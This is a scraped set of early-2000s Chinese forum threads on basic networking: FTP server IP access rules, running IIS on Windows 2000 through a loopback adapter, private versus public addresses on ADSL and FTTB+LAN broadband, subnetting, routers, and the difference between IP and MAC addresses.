1. 只对某几个 IP 开放帐号:
----------------
A: 202.38.241.8
A: 202.38.249.2
A: 202.38.248.3
D: *
----------------
意思是, 对 202.38.241.8 , 202.38.249.2 , 202.38.248.3
开放, 其馀都不准进入
2. 只对一个网段开放:
----------------
A: 202.38.241.*
D: *
-----------------
意思是, 只对 202.38.241.* 开放, 其馀拒绝
3. 只拒绝部分IP
--------------
D: 123.166.*.*
D: 202.38.234.56
A: *
--------------
拒绝 123.166.*.* 的B类网段, 及 202.38.234.56 访问,
其馀都欢迎
看了三个例子, 大家都志该知道 IP 限制如何设置吧,
要注意的一点是, 最后一个限制项目, 最好要设成
A: * (其馀都允许进入) 或
D: * (其馀都不准进入)
否则, 可能会得不到预期中的限制的效果.

Step #2. 看不爽封
如果有个人连了上来, 你看他不爽想封掉他.
在 <<Local Server>> - Activity 或
你的Domain - Activity 会看到他,

右击, KILL USER .............

他在你FTP的命运就在你手中了.

看完了吧，一定要看完。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
上一贴 | 下一贴
快速回复 主题：如何在局域网里架设自己的ftp服务器？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


我快被WIN2000玩疯了 - 经 典 论 坛

计算机技术
我快被WIN2000玩疯了

上一贴 | 下一贴
发表人 主题: 我快被WIN2000玩疯了
李文轩

高级用户
积分：255
发帖：122
来自：
注册：2000-10-19
 发表于 2002-01-03 10:05:24 按此观看李文轩的个人资料 按此发邮件给李文轩 访问李文轩的主页 李文轩 的 oicq 是21922772,查看 21922772 的资料 收藏该主题供以后查看 发送悄悄话给李文轩 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看李文轩的IP
安装了IIS怎么也无法建起ASP平台,每次输入LOCALHOST就脱机连接,想起是TCP/IP没装,想装,但我没有猫,也没有网卡,怎装啊?
各位老大,有没有办法救我,难道要我重装WIN98吗?

天若有情天亦老、月如无恨月长圆。
tntst

高级用户
积分：249
发帖：213
来自：广州
注册：2000-07-23
 发表于 2002-01-03 12:10:03 按此观看tntst的个人资料 按此发邮件给tntst tntst 的 oicq 是10406476,查看 10406476 的资料 发送悄悄话给tntst 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tntst的IP
李文轩在上个帖子中说
引用:
安装了IIS怎么也无法建起ASP平台,每次输入LOCALHOST就脱机连接,想起是TCP/IP没装,想装,但我没有猫,也没有网卡,怎装啊?
各位老大,有没有办法救我,难道要我重装WIN98吗?

没有见过可以欺骗它的方法！

***>> TNTST <<***
-----------------------------------
投稿信箱：tntst@pconline.com.cn
网址： http://www.pconline.com.cn/pcedu
大哥

超级用户
积分：322
发帖：112
来自：
注册：2001-12-20
 发表于 2002-01-03 12:46:42 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
装个VMWare，就会多出来两块网卡。

老哥我知道的就这么多了。
李文轩

高级用户
积分：255
发帖：122
来自：
注册：2000-10-19
 发表于 2002-01-03 13:28:25 按此观看李文轩的个人资料 按此发邮件给李文轩 访问李文轩的主页 李文轩 的 oicq 是21922772,查看 21922772 的资料 发送悄悄话给李文轩 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看李文轩的IP
但我不明白的是,在WIN98下我同样没有装网卡但可以使用PWS啊.

天若有情天亦老、月如无恨月长圆。
大哥

超级用户
积分：322
发帖：112
来自：
注册：2001-12-20
 发表于 2002-01-03 19:12:34 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
Win98里面不用网卡也有loopback设备，所以能装上TCP/IP，Win2K会检查实际的设备，所以装不上了。 以前的NT里面是有loopback设备的。

老哥我知道的就这么多了。
Frentzen

终级用户
积分：675
发帖：168
来自：中山
注册：2000-11-01
 发表于 2002-01-04 11:43:04 按此观看Frentzen的个人资料 按此发邮件给Frentzen Frentzen 的 oicq 是383935,查看 383935 的资料 发送悄悄话给Frentzen 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Frentzen的IP
怎么会呢！我Win2000的IIS无论用机的名字、IP地址（127.0.0.1）或者localhost都可以正常访问。

FrentZen
張無忌

高级用户
积分：263
发帖：147
来自：
注册：2001-04-24
 发表于 2002-01-04 15:06:00 按此观看張無忌的个人资料 按此发邮件给張無忌 访问張無忌的主页 張無忌 的 oicq 是1236541,查看 1236541 的资料 发送悄悄话给張無忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看張無忌的IP
不会阿，就算没有网卡和猫一样可以玩iis阿。

你先设置一下你的主目录吧，不要系统默认的那个目录，把目录指到一个自己新建的。
然后先测试html能否访问，再测试asp。

另外把你的浏览器的internet选项中的连接，改成从不进行拨号连接！

學生時代
stchin

书剑恩仇
现任版主
积分：3568
发帖：1271
来自：
注册：2001-03-07
 发表于 2002-01-06 11:40:11 按此观看stchin的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给stchin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看stchin的IP
asp平台2000里面不用设置.98很麻烦.要装不少相关的东西.直接用2000吧.300的cpu就可以了.

到处都是正确答案

Blueidea Web Team
Moderator Of Code forum

fly

Developer
积分：4146
发帖：1028
来自：
注册：2001-10-31
 发表于 2002-01-06 13:40:38 按此观看fly的个人资料 按此发邮件给fly fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fly的IP
用添加新硬件，选网卡，在MICROSOFT下有那个LOOPBACK网卡，设置好后就可以用了，我的SERVER就是用LOOPBACK后，才玩起了DNS,FTP,IIS，非常爽的

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

tntst

高级用户
积分：249
发帖：213
来自：广州
注册：2000-07-23
 发表于 2002-01-12 09:28:26 按此观看tntst的个人资料 按此发邮件给tntst tntst 的 oicq 是10406476,查看 10406476 的资料 发送悄悄话给tntst 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tntst的IP
爽，学了一招！

***>> TNTST <<***
-----------------------------------
投稿信箱：tntst@pconline.com.cn
网址： http://www.pconline.com.cn/pcedu
上一贴 | 下一贴
快速回复 主题：我快被WIN2000玩疯了
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


一个问题 - 经 典 论 坛

计算机技术
一个问题

上一贴 | 下一贴
发表人 | 主题: 一个问题
早起的虫子 初级用户 积分：37 发帖：12 来自：山东 注册：2001-01-22 | 发表于 2001-12-19 18:17:59 按此观看早起的虫子的个人资料 按此发邮件给早起的虫子 早起的虫子 的 oicq 是161196,查看 161196 的资料 收藏该主题供以后查看 发送悄悄话给早起的虫子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看早起的虫子的IP 我这里是ADSL，有固定IP，我用的是windows2000server，想自己做个网站的， 可是现在有个问题很是困扰我，还请各位大哥帮帮忙啊！！ 我的机子IP是10.8.0.75，网关10.0.0.1 子网掩码是255.0.0.0 IIS默认目录是:\myweb d:\myweb\index.asp 现在的问题是在我的机子打上10.8.0.75能看到index.asp上的内容，在局域网内也能看 到 可是在别的地方却看不到，提示找不到服务器 各位帮下忙看看是什么原因呢？ 我怀疑是不是网关跟子网掩码有关呢？
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-19 19:10:50 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 10开头的 是电信局ATM内部IP 当你访问公网时 由ATM来映射内部IP为外部IP 相当于你现在也是处在一个局域网内 而不是直接连接公网 你可以向电信局机房询问公网IP转换情况 他们会告诉你你在公网上的IP 一般会类似202.xxx.xxx.75这样的 这样当别人用你的公网IP访问时 会先访问到你的ATM 再由ATM转换为内部IP 最后连接到你的电脑 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
张无忌 win1st 管理员 积分：7152 发帖：3115 来自：Blueidea.com 注册：2000-09-10 | 发表于 2001-12-19 19:55:45 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP 你的所谓固定ip只是内部网络的，并不是internet的！所以没用！ 态度决定一切 Blueidea Web Team Team Member
张无忌 win1st 管理员 积分：7152 发帖：3115 来自：Blueidea.com 注册：2000-09-10 | 发表于 2001-12-19 19:58:07 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP 可以黑掉电信局的服务器，然后设置IP映射，或静态路由。 置于怎么黑掉，请请教赵鹏。 态度决定一切 Blueidea Web Team Team Member
上一贴 | 下一贴
快速回复 主题：一个问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


局域网的问题？？？？？？ - 经 典 论 坛

计算机技术
局域网的问题？？？？？？

上一贴 | 下一贴
发表人 | 主题: 局域网的问题？？？？？？
yixinguy78 终级用户 积分：546 发帖：194 来自：china 注册：2001-02-10 | 发表于 2002-01-04 14:21:26 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 局域网中有350台机器，我分配IP时如何做，可不可以这样，子网掩码为192.168.0.0， 下边工作站IP为192.168.0.1~192.168.0.100 ，192.168.1.1~192.168.1.100，192.168.2.1~192.168.2.150，这样行不行？？？？？？ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
wx@ay 看不懂 积分：7424 发帖：5353 来自：ay.ha.cn 注册：1999-12-23 | 发表于 2002-01-04 16:11:13 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 子网掩码192.168.0.0？？ 建议子网掩码设为 255.255.255.224 192.168.0.1最好保留不用。 Think like a Genius. 有些爱情象指甲，有些象牙齿。 指甲能不断生长，不要的就剪掉。 而牙齿就不同。 象牙齿的爱情会不同，它会永远！ 小心蛀牙！！！
BIGBUG 终级用户 积分：1278 发帖：803 来自：不一定 注册：2001-03-21 | 发表于 2002-01-04 16:48:24 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP 350台的话不建议使用192.168.0.～ IP段，因为你只能配置254台（子网掩码255.255.255.0） 建议使用子网掩码为255.255.0.0的IP段 等我想想再签
上一贴 | 下一贴
快速回复 主题：局域网的问题？？？？？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


HTTB+Lan宽带的技术内幕？？？ - 经 典 论 坛

计算机技术
HTTB+Lan宽带的技术内幕？？？

上一贴 | 下一贴
发表人 主题: HTTB+Lan宽带的技术内幕？？？
jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-01 21:38:03 按此观看jax的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
谁知道HTTB+Lan的技术方式？
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-01-01 22:00:12 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
是FTTB+LAN吧~~~
是宽带局域网，我家的小区就是用这个~~~

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-01 22:05:12 按此观看jax的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
答非所问，偶问技术内幕，比如是不是一定要设置IP，DNSServer，NETGATE等
jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-01 22:18:15 按此观看jax的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
另外，他和ADSL比速度，谁快？
ladeng

初级用户
积分：102
发帖：51
来自：blueidea
注册：2001-09-21
 发表于 2002-01-02 08:58:04 按此观看ladeng的个人资料 按此发邮件给ladeng 访问ladeng的主页 发送悄悄话给ladeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ladeng的IP
jax在上个帖子中说
引用:
答非所问，偶问技术内幕，比如是不是一定要设置IP，DNSServer，NETGATE等

这是直接光纤到大楼的，当然要设置IP啦，用私有网的地址10。0。0。X等，DNS就不用了 。

风吹着云儿散了，下雨的季节过了
花落的时候来了，想你的日子到了
邻家的枣又熟了，春天的燕子飞了
隔壁的姑娘哭了，为什么呀你
这又何必呢，爱你的人儿来了
你爱的人儿走了，孤独的云儿飘着
大哥

超级用户
积分：322
发帖：112
来自：
注册：2001-12-20
 发表于 2002-01-02 12:04:12 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
我用电信的FTTB，有正式的固定IP。

对一般用户，IP、DNS、Gateway都是通过DHCP分配的，无须设置。 固定IP的用户才需要自己设置。

实际连接速度上下行对称，5－10Mbps，而号称的是100M。

老哥我知道的就这么多了。
jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-02 13:19:32 按此观看jax的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
如何申请固定IP呢？
理论速度偶知道，实际速度呢？比如下载？？？
大哥

超级用户
积分：322
发帖：112
来自：
注册：2001-12-20
 发表于 2002-01-03 13:23:27 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
可以向电信局申请固定IP，免费的，不过得和他们有一定的关系，我请他们吃了一餐饭，敬了三杯酒才得到3个固定IP，呵呵。。。

实际速度我不是说了吗？ 5－10Mbps，也就是下载速度最大 500KB-1MB左右。我的最快记录是下载一张620多M的CD花了17分钟。不管怎么样，比起10M的LAN来说平均还是慢一半左右，我在本地LAN上传文件都可以稳定在1.2MB/s。

老哥我知道的就这么多了。
幽灵

超级用户
积分：362
发帖：217
来自：上海
注册：2001-02-25
 发表于 2002-01-03 18:33:43 按此观看幽灵的个人资料 按此发邮件给幽灵 幽灵 的 oicq 是15868256,查看 15868256 的资料 发送悄悄话给幽灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看幽灵的IP
在小区内是一个内网IP，练到Inernet上就是另外的IP了，我的这个IP一开始就是固定的，可不是通过什么特殊手段得来的哦！
我的上行是10M，一般下载速度都是300～500K/S之间，但是有一次去PCHOME下流氓兔，哇考，3M多的东西居然1秒搞定！FAINT!

上帝会保佑我的，一切都会有的！
大哥

超级用户
积分：322
发帖：112
来自：
注册：2001-12-20
 发表于 2002-01-03 19:20:08 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
嘿嘿，你的是内网IP当然是免费附送的，我的是61开头的地址。

老哥我知道的就这么多了。
jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-03 19:49:01 按此观看jax的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
偶考虑了很久，认为目前的HTTB+Lan宽带分为2种，一是有固定IP，需要设置IP，DNS的，另一种是无固定IP，不需要设置IP，DNS，后一种是基于VLAN（虚拟局域网）技术，利用Switch的Port分配不同的VLAN网段，大家认为呢？
張無忌

高级用户
积分：263
发帖：147
来自：
注册：2001-04-24
 发表于 2002-01-03 20:12:00 按此观看張無忌的个人资料 按此发邮件给張無忌 访问張無忌的主页 張無忌 的 oicq 是1236541,查看 1236541 的资料 发送悄悄话给張無忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看張無忌的IP
jax在上个帖子中说
引用:
偶考虑了很久，认为目前的HTTB+Lan宽带分为2种，一是有固定IP，需要设置IP，DNS的，另一种是无固定IP，不需要设置IP，DNS，后一种是基于VLAN（虚拟局域网）技术，利用Switch的Port分配不同的VLAN网段，大家认为呢？

这个也算HTTB+Lan的技术内幕？

所有tcp/ip协议的链接都是要设置ip和dns的。而且都是分手动设置和自动分配的。不是他专有。

學生時代
wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-01-05 12:33:37 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
引用:
目前技术成熟、在实际中能够使用的宽带接入手段主要有以下几种：
1．DSL（数字用户环路）技术，这类技术最主要的特征是通过现有的双绞铜线（即普通的电话线）进行高速数据传送。这类技术中ADSL技术、VDSL技术以及HOMEPNA技术在实际中使用较多。其中ADSL技术覆盖范围较广（最远在5公里左右），并且以非对称方式工作（上行800kbit/s，下行6Mbit/s），所以一般以电话局所为中心提供宽带接入，通常不针对特定的小区。HOMEPNA由于技术传输带宽不高（HOMEPNA1.0传输带宽不超过2Mbit/s），传输距离相对较短（一般在300到600米），但价格便宜，常常作为ADSL业务的补充。VDSL技术特点非常适合小区信息化建设的要求，VDSL能够提供对称的10Mbit/s的双向接入，覆盖范围最高可以达到1000米左右，完全能够满足小区信息化的接入带宽要求。
2．“FTTB+LAN”（光纤到小区结合综合布线）技术，该方案是铺设五类线将小区建设成为一个局域网，然后通过光纤与城域网高速连接。由于该方案需要重新布线而不使用电话线，因而适合所有的电信运营商或驻地网建设公司。通过选择合适的局域网交换机，用户可以获得10Mbit/s甚至100Mbit/s的接入速度。“FTTB+LAN”技术主要利用现有的计算机网络技术，尽管还需要不断的改进，但目前是小区信息化建设首选的方案。

FTTB+LAN网络结构示意图：

一般来说，固定IP资源是有限的，所以不可能所有用户都使用固定IP，
因此基本上是采用VLAN技术，内网为固定IP，真正连接INTERNET就不是了。
FTTB+LAN是用的局域网的私网地址，一方面外界无法攻击用户的计算机，另一方面，外界也无法通过IP地址查到用户的计算机，这个对于个人用户来说也是一个好事。

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

大哥

超级用户
积分：322
发帖：112
来自：
注册：2001-12-20
 发表于 2002-01-05 13:30:19 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
呵呵，其实就是以太局域网技术＋光纤远程连接，搞懂了Ethernet就会清楚了。

纠正二楼的说法：vlan的作用是限制LAN内用户互联的，自动分配IP设置（包括DNS、Gateway等一整套设置）的技术叫做DHCP。 手动设置IP的唯一目的是获得固定IP（当然需要电信局允许你手动设置，呵呵）。

老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 主题：HTTB+Lan宽带的技术内幕？？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


网络技术问题，请指点迷津！！ - 经 典 论 坛

计算机技术
网络技术问题，请指点迷津！！

上一贴 | 下一贴
发表人 | 主题: 网络技术问题，请指点迷津！！
yixinguy78 终级用户 积分：546 发帖：194 来自：china 注册：2001-02-10 | 发表于 2002-01-15 14:40:17 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 请问高端路由和低端路由有什么区别？？？？？ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
yunbin 经典强盗 现任版主 积分：2397 发帖：1033 来自：火星 注册：2001-09-27 | 发表于 2002-01-15 14:46:37 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 怎么看着像作业题~ 用户选择路由器时，多从技术角度来考虑，如可延展性、路由协议互操作性、广域数据服务支持、内部ATM支持、SAN集成能力等。另外，选择路由器还应遵循如下基本原则：即标准化原则、技术简单性原则、环境适应性原则、可管理性原则和容错冗余性原则。对于高端路由器，更多的还应该考虑是否和如何适应骨干网对网络高可靠性、接口高扩展性以及路由查找和数据转发的高性能要求。高可靠性、高扩展性和高性能的“三高”特性是高端路由器区别于中、低端路由器的关键所在 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
yixinguy78 终级用户 积分：546 发帖：194 来自：china 注册：2001-02-10 | 发表于 2002-01-15 15:05:05 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 精辟，听君一席话，胜找一下午书，非常感谢，看来我这次的作业可以的A了，谢谢强盗！！！ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
上一贴 | 下一贴
快速回复 主题：网络技术问题，请指点迷津！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


IP地址与MAC地址简介 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
IP地址与MAC地址简介

上一贴 | 下一贴
发表人 主题: IP地址与MAC地址简介
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-12 14:51:23 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 收藏该主题供以后查看 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
IP地址是指Internet协议使用的地址，而MAC地址是Ethernet协议使用的地址。
IP地址与MAC地址之间并没有什么必然的联系，MAC地址是Ethernet NIC（网卡）上带的地址，为48位长。每个Ethernet NIC厂家必须向IEEE组织申请一组MAC地址，在生产NIC时编程于NIC卡上的串行EEPROM中。因此每个Ethernet NIC生产厂家必须申请一组MAC地址。任何两个NIC的MAC地址，不管是哪一个厂家生产的都不应相同。Ethernet芯片厂家不必负责MAC地址的申请，MAC地址存在于每一个Ethernet包中，是Ethernet包头的组成部分，Ethernet交换机根据Ethernet包头中的MAC源地址和MAC目的地址实现包的交换和传递。
IP地址是Internet协议地址，每个Internet包必须带有IP地址，每个Internet 服务提供商（ISP）必须向有关组织申请一组IP地址，然后一般是动态分配给其用户，当然用户也可向ISP申请一个IP地址（根椐接入方式），这就是为什么在配置Windows NT/95/98的“拨号网络”时，一般让系统给自动分配IP地址。 IP地址现是32位长。IP地址与MAC地址无关，因为Ethernet的用户，仍然可通过Modem连接Internet。IP地址通常工作于广域网，我们所说的Router（路由器）处理的就是IP地址。
MAC地址工作于局域网，局域网之间的互连一般通过现有的公用网或专用线路，需要进行网间协议转换。可以在Ethernet上传送IP信息，此时IP地址只是Ethernet信息包数据域的一部分，Ethernet交换机或处理器看不见IP地址，只是将其作为普通数据处理，网络上层软件才会处理IP地址。
那么如何知道你的机器上的IP地址和MAC地址呢？
一、对于MAC地址，如果你使用的Windows 95/98，也可通过以下两种方式获得：
1）.进入“开始”— “运行”窗口，输入“winipcfg”
2）.进入命令行方式，键入“IPCONFIG /ALL”，屏幕显示如下信息：
Windows 98 IP Configuration
Host Name . . . . . . . . . : newsun
DNS Servers . . . . . . . . : 202.99.168.8
Node Type . . . . . . . . . : Hybrid
NetBIOS Scope ID. . . . . . :
IP Routing Enabled. . . . . : No
WINS Proxy Enabled. . . . . : No
NetBIOS Resolution Uses DNS : Yes
0 Ethernet adapter :
Description . . . . . . . . : Novell 2000 Adapter.
Physical Address. . . . . . : 00-88-CC-06-05-43
DHCP Enabled. . . . . . . . : No
IP Address. . . . . . . . . : 192.168.1.3
Subnet Mask . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . : 192.168.1.1
Primary WINS Server . . . . : 192.168.1.2
Secondary WINS Server . . . :
Lease Obtained. . . . . . . :
Lease Expires . . . . . . . :
如果你使用的是Windows NT 4.0或WIN2K，进入命令行方式，键入“IPCONFIG /ALL”，屏幕显示与上相似的信息。
二、对于IP地址值，除了查看在网络的“TCP/IP属性”中的设置以外，也可以通过上述方法查看。如果你的机器是通过DHCP服务器获得的IP地址 ,在“TCP/IP属性”中是看不到的。因为是DHCP服务器自动分配给你的，这其中又涉及到一个有效期的概念，即DHCP服务器每分配一个IP时就设置一个此IP的有效时间，当你使用这个IP地址达到一半的有效时间时，你的计算机会自动向DHCP发数据包，继续申请使用此IP。

注 [image] HCP---Dynamic Host Configuration Protocol(动态主机配置协议)

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-12 17:52:21 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
这篇文章很有趣！

还有其他的相关文章吗？
类似的也可以！
告诉我一两个！！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-12 20:42:19 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
通过网络监视器察看的数据包现实的就是MAC地址。
怎么会有趣

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
